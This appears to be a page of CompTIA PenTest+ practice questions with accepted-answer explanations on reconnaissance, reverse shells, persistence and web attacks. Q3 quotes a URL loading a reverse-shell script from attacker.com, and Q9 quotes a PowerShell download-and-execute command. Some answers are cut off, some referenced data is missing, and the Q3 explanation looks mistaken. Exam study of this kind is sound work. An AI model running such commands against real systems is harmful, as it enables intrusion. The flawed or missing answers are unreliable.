Question 1

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:  Which of the following types of vulnerabilities is being exploited?

Accepted Answer

The answer of A penetration tester is testing a banking...

Question 2

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

Accepted Answer

The answer of A penetration tester has been assigned to...

Question 3

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?

Accepted Answer

Blocking URL redirections prevents attackers from redirecting users to malicious websites.

Question 4

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

Accepted Answer

The method using bash to redirect input and output over TCP is a common way to create a reverse shell, especially when the target system has unrestricted access over port 443.

Question 5

Which of the following would be the BEST for performing passive reconnaissance on a target's external domain?

Accepted Answer

Shodan is a search engine that allows users to find specific types of computers (webcams, routers, servers, etc.) connected to the internet, making it ideal for passive reconnaissance on a target's external domain.

Question 6

A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

Accepted Answer

Searching the internet for information on staff, such as social networking sites, is a non-intrusive and legal method of gathering OSINT (Open Source Intelligence) without directly interacting with or deceiving the staff.

Question 7

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).

Accepted Answer

The answer of A penetration tester was able to retrieve...

Question 8

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

Accepted Answer

The answer of A penetration tester has a full shell...

Question 9

Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet Which of the following BEST describes the actions performed by this command?

Accepted Answer

The command downloads and executes a script from a remote URL using the Invoke-Expression (IEX) cmdlet.

Question 10

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

Accepted Answer

HKEY_CURRENT_USER is accessible to users with limited privileges and can be used to maintain persistence by modifying settings specific to the current user.

Question 11

A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

Accepted Answer

Swagger is a tool that helps in understanding and documenting APIs, which is crucial for preparing and conducting API testing.

Question 12

If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8 Which of the following formats is the correct hash type?

Accepted Answer

The answer of If a security consultant comes across a...

Question 13

Given the following Python script:  Which of the following is where the output will go?

Accepted Answer

The answer of Given the following Python script:  Which...

Question 14

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

Accepted Answer

A missing content security policy header can make a web application vulnerable to clickjacking attacks, as it helps prevent the embedding of the site in iframes.

Question 15

A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

Accepted Answer

The answer of A penetration tester delivers a web application...

Question 16

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

Accepted Answer

The answer of A software developer wants to test the...

Question 17

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

Accepted Answer

The answer of During testing, a critical vulnerability is discovered...

Question 18

A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?

Accepted Answer

The most likely scenario is that the badge was cloned, allowing two entries to be logged in a short period without a corresponding exit, which suggests unauthorized duplication.

Question 19

A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

Accepted Answer

The command "nmap -p 22 -iL targets" is used to scan the list of targets provided in a file for open SSH ports (port 22). The "-iL" option specifies that Nmap should read the list of targets from a file.

Question 20

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

Accepted Answer

An HTTP downgrade attack forces the victim's browser to use an unencrypted HTTP connection instead of an encrypted HTTPS connection, allowing the attacker to capture the victim's web traffic unencrypted.

Exam 12: CompTIA PenTest+ Certification Exam

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy: Which of the following types of vulnerabilities is being exploited?